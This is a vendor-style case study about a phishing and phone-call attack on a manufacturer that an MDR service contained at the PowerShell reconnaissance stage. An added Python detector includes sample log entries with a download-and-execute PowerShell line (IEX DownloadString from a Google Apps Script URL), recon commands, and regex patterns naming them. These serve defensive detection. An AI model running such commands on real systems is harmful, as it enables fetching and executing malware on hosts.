Thwarted Phishing Attack Shuts the Door to Ransomware
No company is immune from a cyberattack, but with a quick response from a managed detection and response (MDR) service, the damage from a recent phishing attack was minimal.
The target: a global manufacturer of appliances for home and commercial use we’ll call Grumbach (companies generally like to remain anonymous when discussing their cybersecurity arrangements, and Grumbach is no exception).
Open Systems partners with Microsoft to deliver both its MDR and EDR services. The MDR service leverages Azure Sentinel and Open Systems’ curated workbooks to raise potential issues. The EDR service takes advantage of Microsoft Defender for Endpoint, which provides endpoint protection, endpoint detection and response and vulnerability management.
Cybersecurity tooling, however, is only part of the story. The quick action on the part of Open Systems security operations center (SOC) engineers caught this attack, preventing it from doing untold damage to Grumbach’s systems.
On June 10, 2021, at 11:50 AM local time, Microsoft Defender detected suspicious behavior on the workstation of a Grumbach employee. It automatically created a ticket and raised an alert in the Open Systems SOC Portal.
A SOC engineer at Open Systems investigated the problem and rapidly identified the malicious intention behind this alert: a suspicious PowerShell routine running on the Grumbach employee’s computer.
The engineer proceeded to isolate the host immediately as authorized per the rules of engagement that Grumbach and Open Systems had defined together. Those rules allow Open Systems to take a certain number of reactive measures without prior approval, depending on the severity of the situation.
Isolating the host prevented it from causing further harm, and an initial assessment determined that the attack was contained and not affecting other hosts. The engineer was now able to dive into the investigation to get to the bottom of the attack.
This malicious routine was in the ‘recon’ phase, gathering information about Grumbach’s systems in order to mount the primary attack. This recon included identifying the public IP address, hostname, and administrator ID for the employee workstation.
Once this recon was complete, the malicious PowerShell script attempted to download malware from the Google Apps Script service – but was fortunately not able to proceed as the requested malicious file was not present.
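The two stages described above (host reconnaissance, then a download from Google Apps Script) each look unremarkable on their own; the signal is the combination on a single host. The following is an added example, not code from the article or from Open Systems, showing how that correlation can be expressed over PowerShell script-block log entries (Windows Event ID 4104, which records the script text that ran). The log entries, hostnames, and the script.google.com URL are constructed for illustration; the actual script seen by the SOC is not on the page.

```python
import re
from dataclasses import dataclass, field

# Constructed sample events: four script-block entries (Event ID 4104) from two
# hosts. WS-1042 mimics the recon-then-download sequence the article describes;
# WS-0007 runs an ordinary file count and should not be flagged.
SAMPLE_EVENTS = [
    {"host": "WS-1042", "event_id": 4104,
     "script": "$pub = (Invoke-WebRequest 'https://api.ipify.org').Content"},
    {"host": "WS-1042", "event_id": 4104,
     "script": "$h = $env:COMPUTERNAME; $admins = Get-LocalGroupMember -Group Administrators"},
    {"host": "WS-1042", "event_id": 4104,
     "script": "IEX (New-Object Net.WebClient).DownloadString('https://script.google.com/macros/s/EXAMPLE/exec')"},
    {"host": "WS-0007", "event_id": 4104,
     "script": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
]

# Recon indicators matching the three items the article lists: public IP lookup,
# hostname collection, and local administrator enumeration.
RECON_PATTERNS = {
    "public_ip": re.compile(r"ipify|ifconfig\.me|icanhazip|checkip", re.I),
    "hostname": re.compile(r"\$env:COMPUTERNAME|hostname", re.I),
    "admin_enum": re.compile(r"Get-LocalGroupMember|net\s+localgroup\s+administrators", re.I),
}

# Download stage: a web fetch whose target is the Google Apps Script service.
DOWNLOAD_PATTERN = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|iwr|Invoke-RestMethod)"
    r".*script\.google\.com", re.I)


@dataclass
class HostFindings:
    """Indicators accumulated for one host across all of its script blocks."""
    recon: set = field(default_factory=set)
    download: bool = False

    def severity(self) -> str:
        # Recon followed by a staged download is the pattern that justifies
        # isolating the host under pre-agreed rules of engagement.
        if self.download and self.recon:
            return "high"
        if self.download or len(self.recon) >= 2:
            return "medium"
        if self.recon:
            return "low"
        return "none"


def analyze(events):
    """Group 4104 events by host and record which indicators each host hit."""
    per_host = {}
    for ev in events:
        if ev.get("event_id") != 4104:
            continue  # only script-block logging carries the script text
        findings = per_host.setdefault(ev["host"], HostFindings())
        text = ev["script"]
        for name, pattern in RECON_PATTERNS.items():
            if pattern.search(text):
                findings.recon.add(name)
        if DOWNLOAD_PATTERN.search(text):
            findings.download = True
    return per_host


def triage(events):
    """Map each host to a severity label suitable for raising a SOC ticket."""
    return {host: f.severity() for host, f in analyze(events).items()}


if __name__ == "__main__":
    for host, severity in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {severity}")
```

Script-block logging must be enabled for Event ID 4104 to exist at all; the same correlation could equally be written as a Sentinel KQL query over the DeviceEvents table, which is where an MDR service like the one described would normally run it.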
Open Systems then asked the Grumbach administrator to reset the affected user's credentials and recommended restaging the compromised device (wiping it and rebuilding it from a master image) to ensure any remaining threat was removed.
The Point of Compromise
Subsequent to the attack, Open Systems specialists conducted an investigation and determined that the original point of entry occurred when the Grumbach employee clicked a malicious link in a phishing email.
The email purported to be from a federal customs official, and it claimed that customs was holding a package for the employee at the border. It then instructed the target to click the malicious link in order to resolve the issue.
Nearly simultaneous to the employee receiving the malicious email, he also received a telephone call from someone claiming to be from customs, informing him of the email and again instructing him to click the link.
Even with this unusual dual-vector attack, the employee might have become suspicious, save for the fact that he was in truth waiting for a package from outside the country. Whether the attackers were aware of the package or simply got lucky with this fellow remains unknown.
Open Systems was previously aware of this type of attack. In fact, so was the local customs office, which had posted a warning about it on its website.
The malicious email was able to bypass the phishing protection in Microsoft 365. Unfortunately, Grumbach had chosen not to upgrade to Microsoft 365 Advanced Protection, which likely would have caught and filtered the phishing email.
The Intellyx Take
The techniques this attacker used – a phishing email, a malicious phone call, a malicious PowerShell script, and malware downloaded from the Google Apps Script service – are all common, simple, and reasonably unsophisticated.
As a result, mitigating this attack didn't require a particularly expert response from Open Systems' engineers compared to what a more sophisticated attack would demand. The engineers' actions were essentially routine.
One might wonder, therefore, whether Grumbach would be better off staffing their own SOC instead. Couldn’t they simply hire their own cybersecurity engineers?
The answer: bringing cybersecurity response in-house would not be cost-effective. A SOC must operate 24 x 7, an expensive proposition given the shortage of people with cybersecurity expertise, and, as in this case, Grumbach required a rapid response to the threat.
Add to that expense the tools such professionals need to adequately address the security needs of the organization and the requirement for a single pane of glass, and outsourcing MDR and EDR to a firm like Open Systems becomes a straightforward decision.